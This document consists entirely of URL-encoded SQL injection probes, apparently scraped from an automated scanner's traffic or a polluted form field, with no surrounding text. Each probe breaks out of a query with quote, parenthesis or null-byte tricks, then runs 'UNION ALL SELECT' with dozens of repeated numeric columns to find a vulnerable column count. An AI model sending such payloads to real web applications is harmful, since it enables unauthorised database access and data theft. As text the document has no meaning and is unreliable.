-4378%25%27%29%29%20UNION%20ALL%20SELECT%203888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888--%20 -8302%25%27%29%29%20UNION%20ALL%20SELECT%204449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449%2C4449--%20 -2752%25%27%29%29%29%20UNION%20ALL%20SELECT%208072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072%2C8072--%20 -8294%25%27%29%29%29%20UNION%20ALL%20SELECT%207620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620--%20 -2505%25%27%29%29%29%20UNION%20ALL%20SELECT%209792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792--%20 -2958%25%27%29%29%29%20UNION%20ALL%20SELECT%203033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033%2C3033--%20 -1208%25%27%29%29%29%20UNION%20ALL%20SELECT%204085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085%2C4085--%20 -6713%25%27%29%29%29%20UNION%20ALL%20SELECT%205490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490--%20 -6979%25%27%29%29%29%20UNION%20ALL%20SELECT%209252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252--%20 -4373%25%27%29%29%29%20UNION%20ALL%20SELECT%201351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351--%20 -4061%25%27%29%29%29%20UNION%20ALL%20SELECT%205686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686--%20 -1328%25%27%29%29%29%20UNION%20ALL%20SELECT%203910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910--%20 -6942%25%27%20UNION%20ALL%20SELECT%204605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605%2C4605--%20 -2656%25%27%20UNION%20ALL%20SELECT%201344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344%2C1344--%20 -3814%25%27%20UNION%20ALL%20SELECT%201198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198%2C1198--%20 -6373%25%27%20UNION%20ALL%20SELECT%201077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077--%20 -4055%25%27%20UNION%20ALL%20SELECT%205412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412%2C5412--%20 -3464%25%27%20UNION%20ALL%20SELECT%202330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330--%20 -6114%25%27%20UNION%20ALL%20SELECT%205907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907--%20 -4558%25%27%20UNION%20ALL%20SELECT%209983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983%2C9983--%20 -6575%25%27%20UNION%20ALL%20SELECT%201212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212%2C1212--%20 -7764%25%27%20UNION%20ALL%20SELECT%202214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214%2C2214--%20 -5371%00%27%29%20UNION%20ALL%20SELECT%209945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945%2C9945--%20 -3661%00%27%29%20UNION%20ALL%20SELECT%208016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016%2C8016--%20 -6060%00%27%29%20UNION%20ALL%20SELECT%208829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829--%20 -5175%00%27%29%20UNION%20ALL%20SELECT%207617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617%2C7617--%20 -5817%00%27%29%20UNION%20ALL%20SELECT%208051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051%2C8051--%20 -5414%00%27%29%20UNION%20ALL%20SELECT%204453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453%2C4453--%20 -3756%00%27%29%20UNION%20ALL%20SELECT%205938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938%2C5938--%20 -5606%00%27%29%20UNION%20ALL%20SELECT%206590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590%2C6590--%20 -6720%00%27%29%20UNION%20ALL%20SELECT%202543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543%2C2543--%20 -2719%00%27%29%20UNION%20ALL%20SELECT%207297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297--%20 -4630%00%27%20UNION%20ALL%20SELECT%209147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147%2C9147--%20 -3731%00%27%20UNION%20ALL%20SELECT%202000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000--%20 -6176%00%27%20UNION%20ALL%20SELECT%204405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405%2C4405--%20 -3506%00%27%20UNION%20ALL%20SELECT%205775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775--%20 -3367%00%27%20UNION%20ALL%20SELECT%205550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550%2C5550--%20 -8711%00%27%20UNION%20ALL%20SELECT%208465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465--%20 -3252%00%27%20UNION%20ALL%20SELECT%202029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029%2C2029--%20 -9711%00%27%20UNION%20ALL%20SELECT%209969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969%2C9969--%20 -2569%00%27%20UNION%20ALL%20SELECT%203625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625--%20 -6115%00%27%20UNION%20ALL%20SELECT%201605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605--%20 -6132%27%29%20WHERE%204196%3D4196%20UNION%20ALL%20SELECT%204196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196%2C4196--%20 -5919%27%29%20WHERE%201448%3D1448%20UNION%20ALL%20SELECT%201448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448--%20 -6467%27%29%20WHERE%202740%3D2740%20UNION%20ALL%20SELECT%202740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740%2C2740--%20 -8607%27%29%20WHERE%208090%3D8090%20UNION%20ALL%20SELECT%208090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090--%20 -5952%27%29%20WHERE%206064%3D6064%20UNION%20ALL%20SELECT%206064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064--%20 -2653%27%29%20WHERE%208112%3D8112%20UNION%20ALL%20SELECT%208112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112%2C8112--%20 -3941%27%29%20WHERE%209099%3D9099%20UNION%20ALL%20SELECT%209099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099--%20 -6626%27%29%20WHERE%204344%3D4344%20UNION%20ALL%20SELECT%204344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344%2C4344--%20 -2869%27%29%20WHERE%205578%3D5578%20UNION%20ALL%20SELECT%205578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578--%20 -6120%27%29%20WHERE%205886%3D5886%20UNION%20ALL%20SELECT%205886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886%2C5886--%20 -1327%22%29%20WHERE%204888%3D4888%20UNION%20ALL%20SELECT%204888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888--%20 -8603%22%29%20WHERE%203241%3D3241%20UNION%20ALL%20SELECT%203241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241%2C3241--%20 -4532%22%29%20WHERE%208497%3D8497%20UNION%20ALL%20SELECT%208497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497%2C8497--%20 -8022%22%29%20WHERE%206526%3D6526%20UNION%20ALL%20SELECT%206526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526--%20 -6253%22%29%20WHERE%203872%3D3872%20UNION%20ALL%20SELECT%203872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872%2C3872--%20 -2971%22%29%20WHERE%202216%3D2216%20UNION%20ALL%20SELECT%202216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216--%20 